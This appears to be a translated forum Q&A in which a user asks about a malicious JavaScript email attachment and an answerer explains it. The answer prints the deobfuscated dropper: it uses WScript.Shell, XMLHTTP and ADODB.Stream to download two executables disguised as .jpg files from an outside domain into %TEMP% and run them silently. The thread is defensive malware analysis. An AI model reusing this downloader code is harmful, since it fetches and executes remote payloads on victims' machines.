如果有人知道这个java脚本文件中发生了什么,你能告诉我吗?我们的客户将此作为电子邮件发送好了......现在她无法打开任何文档或电子表格。看起来它也传播到网络的其他部分。
如果有人能帮助我理解它,我将非常感激。
我删除了它,而不是我想让别人抓住的东西。
我可能不需要告诉任何人,但请不要打开它,除非它在沙盒中。如果你把你的电脑搞得一团糟,我不负责任。
来源:PM我的文件而不是..
答案 0 :(得分:3)
基本上,它将病毒下载到你的临时文件夹并执行它......
您应该在整个网络上运行病毒扫描。
var AxProxy = function() {};
(function () {
function fFh(fr, Klw, rn) {
var VeZ = new AxProxy('WScript.Shell');
var Klw = VeZ['ExpandEnvironmentStrings']('%TEMP%') + "\\" + Klw;
var OG4 = new AxProxy('MSXML2.XMLHTTP');
OG4['onReadyStateChange'] = function() {
if (OG4['readyState'] === 4) {
var g38 = new AxProxy('ADODB.Stream');
g38['open']();
g38['type'] = 1;
g38['write'](OG4['ResponseBody']);
g38['position'] = 0;
g38['saveToFile'](Klw, 2);
g38['close']();
}
};
try {
OG4['open']('GET', fr, false);
OG4['send']();
if (rn > 0) {
VeZ['Run'](Klw, 0, 0);
}
} catch (er) {};
}
fFh("http://dorttlokolrt.com/images/one.jpg", '542824559.exe', 1);
fFh("http://dorttlokolrt.com/images/two.jpg", '589878543.exe', 1);
}();
所有其他变量只是混乱,意在混淆和阻止解码。
PS:我已代理ActiveXObject因此无法执行此操作...